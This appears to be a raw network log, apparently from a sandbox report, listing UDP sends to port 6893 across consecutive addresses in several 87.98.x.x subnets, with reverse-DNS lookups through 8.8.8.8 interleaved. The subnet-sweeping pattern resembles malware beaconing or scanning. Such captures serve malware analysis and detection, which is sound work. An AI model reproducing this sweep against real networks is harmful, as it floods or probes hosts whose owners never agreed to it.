FR 87.98.176.119:6893 udp
FR 87.98.176.120:6893 udp
FR 87.98.176.121:6893 udp
FR 87.98.176.122:6893 udp
FR 87.98.176.123:6893 udp
FR 87.98.176.124:6893 udp
FR 87.98.176.125:6893 udp
FR 87.98.176.126:6893 udp
FR 87.98.176.127:6893 udp
FR 87.98.176.128:6893 udp
FR 87.98.176.129:6893 udp
FR 87.98.176.130:6893 udp
FR 87.98.176.131:6893 udp
FR 87.98.176.132:6893 udp
FR 87.98.176.133:6893 udp
FR 87.98.176.134:6893 udp
FR 87.98.176.135:6893 udp
FR 87.98.176.136:6893 udp
FR 87.98.176.137:6893 udp
FR 87.98.176.138:6893 udp
FR 87.98.176.139:6893 udp
FR 87.98.176.140:6893 udp
FR 87.98.176.141:6893 udp
FR 87.98.176.142:6893 udp
FR 87.98.176.143:6893 udp
FR 87.98.176.144:6893 udp
FR 87.98.176.145:6893 udp
FR 87.98.176.146:6893 udp
FR 87.98.176.147:6893 udp
FR 87.98.176.148:6893 udp
FR 87.98.176.149:6893 udp
FR 87.98.176.150:6893 udp
FR 87.98.176.151:6893 udp
FR 87.98.176.152:6893 udp
FR 87.98.176.153:6893 udp
FR 87.98.176.154:6893 udp
FR 87.98.176.155:6893 udp
FR 87.98.176.156:6893 udp
FR 87.98.176.157:6893 udp
FR 87.98.176.158:6893 udp
FR 87.98.176.159:6893 udp
FR 87.98.176.160:6893 udp
FR 87.98.176.161:6893 udp
FR 87.98.176.162:6893 udp
FR 87.98.176.163:6893 udp
FR 87.98.176.164:6893 udp
FR 87.98.176.165:6893 udp
FR 87.98.176.166:6893 udp
FR 87.98.176.167:6893 udp
FR 87.98.176.168:6893 udp
FR 87.98.176.169:6893 udp
FR 87.98.176.170:6893 udp
FR 87.98.176.171:6893 udp
FR 87.98.176.172:6893 udp
FR 87.98.176.173:6893 udp
FR 87.98.176.174:6893 udp
FR 87.98.176.175:6893 udp
FR 87.98.176.176:6893 udp
FR 87.98.176.177:6893 udp
FR 87.98.176.178:6893 udp
FR 87.98.176.179:6893 udp
FR 87.98.176.180:6893 udp
FR 87.98.176.181:6893 udp
FR 87.98.176.182:6893 udp
FR 87.98.176.183:6893 udp
FR 87.98.176.184:6893 udp
FR 87.98.176.185:6893 udp
FR 87.98.176.186:6893 udp
FR 87.98.176.187:6893 udp
FR 87.98.176.188:6893 udp
FR 87.98.176.189:6893 udp
FR 87.98.176.190:6893 udp
FR 87.98.176.191:6893 udp
FR 87.98.176.192:6893 udp
FR 87.98.176.193:6893 udp
FR 87.98.176.194:6893 udp
FR 87.98.176.195:6893 udp
FR 87.98.176.196:6893 udp
FR 87.98.176.197:6893 udp
FR 87.98.176.198:6893 udp
FR 87.98.176.199:6893 udp
FR 87.98.176.200:6893 udp
FR 87.98.176.201:6893 udp
FR 87.98.176.202:6893 udp
FR 87.98.176.203:6893 udp
FR 87.98.176.204:6893 udp
FR 87.98.176.205:6893 udp
FR 87.98.176.206:6893 udp
FR 87.98.176.207:6893 udp
FR 87.98.176.208:6893 udp
FR 87.98.176.209:6893 udp
FR 87.98.176.210:6893 udp
FR 87.98.176.211:6893 udp
FR 87.98.176.212:6893 udp
FR 87.98.176.213:6893 udp
FR 87.98.176.214:6893 udp
FR 87.98.176.215:6893 udp
FR 87.98.176.216:6893 udp
FR 87.98.176.217:6893 udp
FR 87.98.176.218:6893 udp
FR 87.98.176.219:6893 udp
FR 87.98.176.220:6893 udp
FR 87.98.176.221:6893 udp
FR 87.98.176.222:6893 udp
FR 87.98.176.223:6893 udp
FR 87.98.176.224:6893 udp
FR 87.98.176.225:6893 udp
FR 87.98.176.226:6893 udp
FR 87.98.176.227:6893 udp
FR 87.98.176.228:6893 udp
FR 87.98.176.229:6893 udp
FR 87.98.176.230:6893 udp
FR 87.98.176.231:6893 udp
FR 87.98.176.232:6893 udp
FR 87.98.176.233:6893 udp
FR 87.98.176.234:6893 udp
FR 87.98.176.235:6893 udp
FR 87.98.176.236:6893 udp
FR 87.98.176.237:6893 udp
FR 87.98.176.238:6893 udp
FR 87.98.176.239:6893 udp
FR 87.98.176.240:6893 udp
FR 87.98.176.241:6893 udp
FR 87.98.176.242:6893 udp
FR 87.98.176.243:6893 udp
FR 87.98.176.244:6893 udp
FR 87.98.176.245:6893 udp
FR 87.98.176.246:6893 udp
FR 87.98.176.247:6893 udp
FR 87.98.176.248:6893 udp
FR 87.98.176.249:6893 udp
FR 87.98.176.250:6893 udp
FR 87.98.176.251:6893 udp
FR 87.98.176.252:6893 udp
FR 87.98.176.253:6893 udp
FR 87.98.176.254:6893 udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 8.8.8.8:53 0.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 1.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 2.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 3.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 4.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 5.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 7.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 8.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 9.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 10.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 11.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 12.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 6.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 13.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 14.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 15.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 16.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 17.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 18.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 19.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 20.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 22.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 21.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 23.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 24.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 25.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 26.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 27.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 28.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 29.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 30.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 31.12.107.93.in-addr.arpa udp
US 8.8.8.8:53 0.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 1.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 2.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 3.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 5.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 4.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 6.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 7.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 8.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 10.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 9.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 11.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 13.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 12.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 14.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 15.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 16.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 17.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 18.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 19.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 20.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 21.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 23.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 22.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 24.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 25.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 26.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 27.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 28.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 29.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 30.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 0.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 31.200.1.95.in-addr.arpa udp
US 8.8.8.8:53 1.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 2.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 3.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 4.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 5.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 6.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 8.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 7.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 9.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 10.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 11.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 12.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 13.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 14.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 15.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 16.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 17.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 18.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 19.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 20.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 21.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 22.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 23.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 24.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 25.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 26.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 27.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 28.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 29.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 30.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 31.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 32.176.98.87.in-addr.arpa udp
FR 87.98.176.255:6893 udp
FR 87.98.177.0:6893 udp
FR 87.98.177.1:6893 udp
FR 87.98.177.2:6893 udp
FR 87.98.177.3:6893 udp
FR 87.98.177.4:6893 udp
FR 87.98.177.5:6893 udp
FR 87.98.177.6:6893 udp
FR 87.98.177.7:6893 udp
FR 87.98.177.8:6893 udp
FR 87.98.177.9:6893 udp
FR 87.98.177.10:6893 udp
FR 87.98.177.11:6893 udp
FR 87.98.177.12:6893 udp
FR 87.98.177.13:6893 udp
FR 87.98.177.14:6893 udp
FR 87.98.177.15:6893 udp
FR 87.98.177.16:6893 udp
FR 87.98.177.17:6893 udp
FR 87.98.177.18:6893 udp
FR 87.98.177.19:6893 udp
FR 87.98.177.20:6893 udp
FR 87.98.177.21:6893 udp
FR 87.98.177.22:6893 udp
FR 87.98.177.23:6893 udp
FR 87.98.177.24:6893 udp
FR 87.98.177.25:6893 udp
FR 87.98.177.26:6893 udp
FR 87.98.177.27:6893 udp
FR 87.98.177.28:6893 udp
FR 87.98.177.29:6893 udp
FR 87.98.177.30:6893 udp
FR 87.98.177.31:6893 udp
FR 87.98.177.32:6893 udp
FR 87.98.177.33:6893 udp
FR 87.98.177.34:6893 udp
FR 87.98.177.35:6893 udp
FR 87.98.177.36:6893 udp
FR 87.98.177.37:6893 udp
FR 87.98.177.38:6893 udp
FR 87.98.177.39:6893 udp
FR 87.98.177.40:6893 udp
FR 87.98.177.41:6893 udp
FR 87.98.177.42:6893 udp
FR 87.98.177.43:6893 udp
FR 87.98.177.44:6893 udp
FR 87.98.177.45:6893 udp
FR 87.98.177.46:6893 udp
FR 87.98.177.47:6893 udp
FR 87.98.177.48:6893 udp
FR 87.98.177.49:6893 udp
FR 87.98.177.50:6893 udp
FR 87.98.177.51:6893 udp
FR 87.98.177.52:6893 udp
FR 87.98.177.53:6893 udp
FR 87.98.177.54:6893 udp
FR 87.98.177.55:6893 udp
FR 87.98.177.56:6893 udp
FR 87.98.177.57:6893 udp
FR 87.98.177.58:6893 udp
FR 87.98.177.59:6893 udp
FR 87.98.177.60:6893 udp
FR 87.98.177.61:6893 udp
FR 87.98.177.62:6893 udp
FR 87.98.177.63:6893 udp
FR 87.98.177.64:6893 udp
FR 87.98.177.65:6893 udp
FR 87.98.177.66:6893 udp
FR 87.98.177.67:6893 udp
FR 87.98.177.68:6893 udp
FR 87.98.177.69:6893 udp
FR 87.98.177.70:6893 udp
FR 87.98.177.71:6893 udp
FR 87.98.177.72:6893 udp
FR 87.98.177.73:6893 udp
FR 87.98.177.74:6893 udp
FR 87.98.177.75:6893 udp
FR 87.98.177.76:6893 udp
FR 87.98.177.77:6893 udp
FR 87.98.177.78:6893 udp
FR 87.98.177.79:6893 udp
FR 87.98.177.80:6893 udp
FR 87.98.177.81:6893 udp
FR 87.98.177.82:6893 udp
FR 87.98.177.83:6893 udp
FR 87.98.177.84:6893 udp
FR 87.98.177.85:6893 udp
FR 87.98.177.86:6893 udp
FR 87.98.177.87:6893 udp
FR 87.98.177.88:6893 udp
FR 87.98.177.89:6893 udp
FR 87.98.177.90:6893 udp
FR 87.98.177.91:6893 udp
FR 87.98.177.92:6893 udp
FR 87.98.177.93:6893 udp
FR 87.98.177.94:6893 udp
FR 87.98.177.95:6893 udp
FR 87.98.177.96:6893 udp
FR 87.98.177.97:6893 udp
FR 87.98.177.98:6893 udp
FR 87.98.177.99:6893 udp
FR 87.98.177.100:6893 udp
FR 87.98.177.101:6893 udp
FR 87.98.177.102:6893 udp
FR 87.98.177.103:6893 udp
FR 87.98.177.104:6893 udp
FR 87.98.177.105:6893 udp
FR 87.98.177.106:6893 udp
FR 87.98.177.107:6893 udp
FR 87.98.177.108:6893 udp
FR 87.98.177.109:6893 udp
FR 87.98.177.110:6893 udp
FR 87.98.177.111:6893 udp
FR 87.98.177.112:6893 udp
FR 87.98.177.113:6893 udp
FR 87.98.177.114:6893 udp
FR 87.98.177.115:6893 udp
FR 87.98.177.116:6893 udp
FR 87.98.177.117:6893 udp
FR 87.98.177.118:6893 udp
FR 87.98.177.119:6893 udp
FR 87.98.177.120:6893 udp
FR 87.98.177.121:6893 udp
FR 87.98.177.122:6893 udp
FR 87.98.177.123:6893 udp
FR 87.98.177.124:6893 udp
FR 87.98.177.125:6893 udp
FR 87.98.177.126:6893 udp
FR 87.98.177.127:6893 udp
FR 87.98.177.128:6893 udp
FR 87.98.177.129:6893 udp
FR 87.98.177.130:6893 udp
FR 87.98.177.131:6893 udp
FR 87.98.177.132:6893 udp
FR 87.98.177.133:6893 udp
FR 87.98.177.134:6893 udp
FR 87.98.177.135:6893 udp
FR 87.98.177.136:6893 udp
FR 87.98.177.137:6893 udp
FR 87.98.177.138:6893 udp
FR 87.98.177.139:6893 udp
FR 87.98.177.140:6893 udp
FR 87.98.177.141:6893 udp
FR 87.98.177.142:6893 udp
FR 87.98.177.143:6893 udp
FR 87.98.177.144:6893 udp
FR 87.98.177.145:6893 udp
FR 87.98.177.146:6893 udp
FR 87.98.177.147:6893 udp
FR 87.98.177.148:6893 udp
FR 87.98.177.149:6893 udp
FR 87.98.177.150:6893 udp
FR 87.98.177.151:6893 udp
FR 87.98.177.152:6893 udp
FR 87.98.177.153:6893 udp
FR 87.98.177.154:6893 udp
FR 87.98.177.155:6893 udp
FR 87.98.177.156:6893 udp
FR 87.98.177.157:6893 udp
FR 87.98.177.158:6893 udp
FR 87.98.177.159:6893 udp
FR 87.98.177.160:6893 udp
FR 87.98.177.161:6893 udp
FR 87.98.177.162:6893 udp
FR 87.98.177.163:6893 udp
FR 87.98.177.164:6893 udp
FR 87.98.177.165:6893 udp
FR 87.98.177.166:6893 udp
FR 87.98.177.167:6893 udp
FR 87.98.177.168:6893 udp
FR 87.98.177.169:6893 udp
FR 87.98.177.170:6893 udp
FR 87.98.177.171:6893 udp
FR 87.98.177.172:6893 udp
FR 87.98.177.173:6893 udp
FR 87.98.177.174:6893 udp
FR 87.98.177.175:6893 udp
FR 87.98.177.176:6893 udp
FR 87.98.177.177:6893 udp
FR 87.98.177.178:6893 udp
FR 87.98.177.179:6893 udp
FR 87.98.177.180:6893 udp
FR 87.98.177.181:6893 udp
FR 87.98.177.182:6893 udp
FR 87.98.177.183:6893 udp
FR 87.98.177.184:6893 udp
FR 87.98.177.185:6893 udp
FR 87.98.177.186:6893 udp
FR 87.98.177.187:6893 udp
FR 87.98.177.188:6893 udp
FR 87.98.177.189:6893 udp
FR 87.98.177.190:6893 udp
FR 87.98.177.191:6893 udp
FR 87.98.177.192:6893 udp
FR 87.98.177.193:6893 udp
FR 87.98.177.194:6893 udp
FR 87.98.177.195:6893 udp
FR 87.98.177.196:6893 udp
FR 87.98.177.197:6893 udp
FR 87.98.177.198:6893 udp
FR 87.98.177.199:6893 udp
FR 87.98.177.200:6893 udp
FR 87.98.177.201:6893 udp
FR 87.98.177.202:6893 udp
FR 87.98.177.203:6893 udp
FR 87.98.177.204:6893 udp
FR 87.98.177.205:6893 udp
FR 87.98.177.206:6893 udp
FR 87.98.177.207:6893 udp
FR 87.98.177.208:6893 udp
FR 87.98.177.209:6893 udp
FR 87.98.177.210:6893 udp
FR 87.98.177.211:6893 udp
FR 87.98.177.212:6893 udp
FR 87.98.177.213:6893 udp
FR 87.98.177.214:6893 udp
FR 87.98.177.215:6893 udp
FR 87.98.177.216:6893 udp
FR 87.98.177.217:6893 udp
FR 87.98.177.218:6893 udp
FR 87.98.177.219:6893 udp
FR 87.98.177.220:6893 udp
FR 87.98.177.221:6893 udp
FR 87.98.177.222:6893 udp
FR 87.98.177.223:6893 udp
FR 87.98.177.224:6893 udp
FR 87.98.177.225:6893 udp
FR 87.98.177.226:6893 udp
FR 87.98.177.227:6893 udp
FR 87.98.177.228:6893 udp
FR 87.98.177.229:6893 udp
FR 87.98.177.230:6893 udp
FR 87.98.177.231:6893 udp
FR 87.98.177.232:6893 udp
FR 87.98.177.233:6893 udp
FR 87.98.177.234:6893 udp
FR 87.98.177.235:6893 udp
FR 87.98.177.236:6893 udp
FR 87.98.177.237:6893 udp
FR 87.98.177.238:6893 udp
FR 87.98.177.239:6893 udp
FR 87.98.177.240:6893 udp
FR 87.98.177.241:6893 udp
FR 87.98.177.242:6893 udp
FR 87.98.177.243:6893 udp
FR 87.98.177.244:6893 udp
FR 87.98.177.245:6893 udp
FR 87.98.177.246:6893 udp
FR 87.98.177.247:6893 udp
FR 87.98.177.248:6893 udp
FR 87.98.177.249:6893 udp
FR 87.98.177.250:6893 udp
FR 87.98.177.251:6893 udp
FR 87.98.177.252:6893 udp
FR 87.98.177.253:6893 udp
FR 87.98.177.254:6893 udp
US 8.8.8.8:53 33.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 34.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 35.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 36.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 37.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 38.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 39.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 40.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 41.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 42.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 43.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 44.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 45.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 46.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 47.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 48.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 49.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 50.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 52.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 51.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 53.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 54.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 56.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 55.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 57.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 58.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 59.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 60.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 61.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 62.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 63.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 64.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 65.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 66.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 67.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 68.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 69.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 70.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 71.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 73.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 74.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 72.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 75.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 76.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 77.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 78.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 79.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 80.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 82.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 83.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 81.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 84.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 85.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 86.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 87.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 88.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 89.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 90.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 91.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 92.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 93.176.98.87.in-addr.arpa udp
US 8.8.8.8:53 94.176.98.87.in-addr.arpa udp
FR 87.98.177.255:6893 udp
FR 87.98.178.0:6893 udp
FR 87.98.178.1:6893 udp
FR 87.98.178.2:6893 udp
FR 87.98.178.3:6893 udp
FR 87.98.178.4:6893 udp
FR 87.98.178.5:6893 udp
FR 87.98.178.6:6893 udp
FR 87.98.178.7:6893 udp
FR 87.98.178.8:6893 udp
FR 87.98.178.9:6893 udp
FR 87.98.178.10:6893 udp
FR 87.98.178.11:6893 udp
FR 87.98.178.12:6893 udp
FR 87.98.178.13:6893 udp
FR 87.98.178.14:6893 udp
FR 87.98.178.15:6893 udp
FR 87.98.178.16:6893 udp
FR 87.98.178.17:6893 udp
FR 87.98.178.18:6893 udp
FR 87.98.178.19:6893 udp
FR 87.98.178.20:6893 udp
FR 87.98.178.21:6893 udp
FR 87.98.178.22:6893 udp
FR 87.98.178.23:6893 udp
FR 87.98.178.24:6893 udp
FR 87.98.178.25:6893 udp
FR 87.98.178.26:6893 udp
FR 87.98.178.27:6893 udp
FR 87.98.178.28:6893 udp
FR 87.98.178.29:6893 udp
FR 87.98.178.30:6893 udp
FR 87.98.178.31:6893 udp
FR 87.98.178.32:6893 udp
FR 87.98.178.33:6893 udp
FR 87.98.178.34:6893 udp
FR 87.98.178.35:6893 udp
FR 87.98.178.36:6893 udp
FR 87.98.178.37:6893 udp
FR 87.98.178.38:6893 udp
FR 87.98.178.39:6893 udp
FR 87.98.178.40:6893 udp
FR 87.98.178.41:6893 udp
FR 87.98.178.42:6893 udp
FR 87.98.178.43:6893 udp
FR 87.98.178.44:6893 udp
FR 87.98.178.45:6893 udp
FR 87.98.178.46:6893 udp
FR 87.98.178.47:6893 udp
FR 87.98.178.48:6893 udp
FR 87.98.178.49:6893 udp
FR 87.98.178.50:6893 udp
FR 87.98.178.51:6893 udp
FR 87.98.178.52:6893 udp
FR 87.98.178.53:6893 udp
FR 87.98.178.54:6893 udp
FR 87.98.178.55:6893 udp
FR 87.98.178.56:6893 udp
FR 87.98.178.57:6893 udp
FR 87.98.178.58:6893 udp
FR 87.98.178.59:6893 udp
FR 87.98.178.60:6893 udp
FR 87.98.178.61:6893 udp
FR 87.98.178.62:6893 udp
FR 87.98.178.63:6893 udp
FR 87.98.178.64:6893 udp
FR 87.98.178.65:6893 udp
FR 87.98.178.66:6893 udp
FR 87.98.178.67:6893 udp
FR 87.98.178.68:6893 udp
FR 87.98.178.69:6893 udp
FR 87.98.178.70:6893 udp
FR 87.98.178.71:6893 udp
FR 87.98.178.72:6893 udp
FR 87.98.178.73:6893 udp
FR 87.98.178.74:6893 udp
FR 87.98.178.75:6893 udp
FR 87.98.178.76:6893 udp
FR 87.98.178.77:6893 udp
FR 87.98.178.78:6893 udp
FR 87.98.178.79:6893 udp
FR 87.98.178.80:6893 udp
FR 87.98.178.81:6893 udp
FR 87.98.178.82:6893 udp
FR 87.98.178.83:6893 udp
FR 87.98.178.84:6893 udp
FR 87.98.178.85:6893 udp
FR 87.98.178.86:6893 udp
FR 87.98.178.87:6893 udp
FR 87.98.178.88:6893 udp
FR 87.98.178.89:6893 udp
FR 87.98.178.90:6893 udp
FR 87.98.178.91:6893 udp
FR 87.98.178.92:6893 udp
FR 87.98.178.93:6893 udp
FR 87.98.178.94:6893 udp
FR 87.98.178.95:6893 udp
FR 87.98.178.96:6893 udp
FR 87.98.178.97:6893 udp
FR 87.98.178.98:6893 udp
FR 87.98.178.99:6893 udp
FR 87.98.178.100:6893 udp
FR 87.98.178.101:6893 udp
FR 87.98.178.102:6893 udp
FR 87.98.178.103:6893 udp
FR 87.98.178.104:6893 udp
FR 87.98.178.105:6893 udp
FR 87.98.178.106:6893 udp
FR 87.98.178.107:6893 udp
FR 87.98.178.108:6893 udp
FR 87.98.178.109:6893 udp
FR 87.98.178.110:6893 udp
FR 87.98.178.111:6893 udp
FR 87.98.178.112:6893 udp
FR 87.98.178.113:6893 udp
FR 87.98.178.114:6893 udp
FR 87.98.178.115:6893 udp
FR 87.98.178.116:6893 udp
FR 87.98.178.117:6893 udp
FR 87.98.178.118:6893 udp
FR 87.98.178.119:6893 udp
FR 87.98.178.120:6893 udp
FR 87.98.178.121:6893 udp
FR 87.98.178.122:6893 udp
FR 87.98.178.123:6893 udp
FR 87.98.178.124:6893 udp
FR 87.98.178.125:6893 udp
FR 87.98.178.126:6893 udp
FR 87.98.178.127:6893 udp
FR 87.98.178.128:6893 udp
FR 87.98.178.129:6893 udp
FR 87.98.178.130:6893 udp
FR 87.98.178.131:6893 udp
FR 87.98.178.132:6893 udp
FR 87.98.178.133:6893 udp
FR 87.98.178.134:6893 udp
FR 87.98.178.135:6893 udp
FR 87.98.178.136:6893 udp
FR 87.98.178.137:6893 udp
FR 87.98.178.138:6893 udp
FR 87.98.178.139:6893 udp
FR 87.98.178.140:6893 udp
FR 87.98.178.141:6893 udp
FR 87.98.178.142:6893 udp
FR 87.98.178.143:6893 udp
FR 87.98.178.144:6893 udp
FR 87.98.178.145:6893 udp
FR 87.98.178.146:6893 udp
FR 87.98.178.147:6893 udp
FR 87.98.178.148:6893 udp
FR 87.98.178.149:6893 udp
FR 87.98.178.150:6893 udp
FR 87.98.178.151:6893 udp
FR 87.98.178.152:6893 udp
FR 87.98.178.153:6893 udp
FR 87.98.178.154:6893 udp
FR 87.98.178.155:6893 udp
FR 87.98.178.156:6893 udp
FR 87.98.178.157:6893 udp
FR 87.98.178.158:6893 udp
FR 87.98.178.159:6893 udp
FR 87.98.178.160:6893 udp
FR 87.98.178.161:6893 udp
FR 87.98.178.162:6893 udp
FR 87.98.178.163:6893 udp
FR 87.98.178.164:6893 udp
FR 87.98.178.165:6893 udp
FR 87.98.178.166:6893 udp
FR 87.98.178.167:6893 udp
FR 87.98.178.168:6893 udp
FR 87.98.178.169:6893 udp
FR 87.98.178.170:6893 udp
FR 87.98.178.171:6893 udp
FR 87.98.178.172:6893 udp
FR 87.98.178.173:6893 udp
FR 87.98.178.174:6893 udp
FR 87.98.178.175:6893 udp
FR 87.98.178.176:6893 udp
FR 87.98.178.177:6893 udp
FR 87.98.178.178:6893 udp
FR 87.98.178.179:6893 udp
FR 87.98.178.180:6893 udp
FR 87.98.178.181:6893 udp
FR 87.98.178.182:6893 udp
FR 87.98.178.183:6893 udp
FR 87.98.178.184:6893 udp
FR 87.98.178.185:6893 udp
FR 87.98.178.186:6893 udp
FR 87.98.178.187:6893 udp
FR 87.98.178.188:6893 udp
FR 87.98.178.189:6893 udp
FR 87.98.178.190:6893 udp
FR 87.98.178.191:6893 udp
FR 87.98.178.192:6893 udp
FR 87.98.178.193:6893 udp
FR 87.98.178.194:6893 udp
FR 87.98.178.195:6893 udp
FR 87.98.178.196:6893 udp
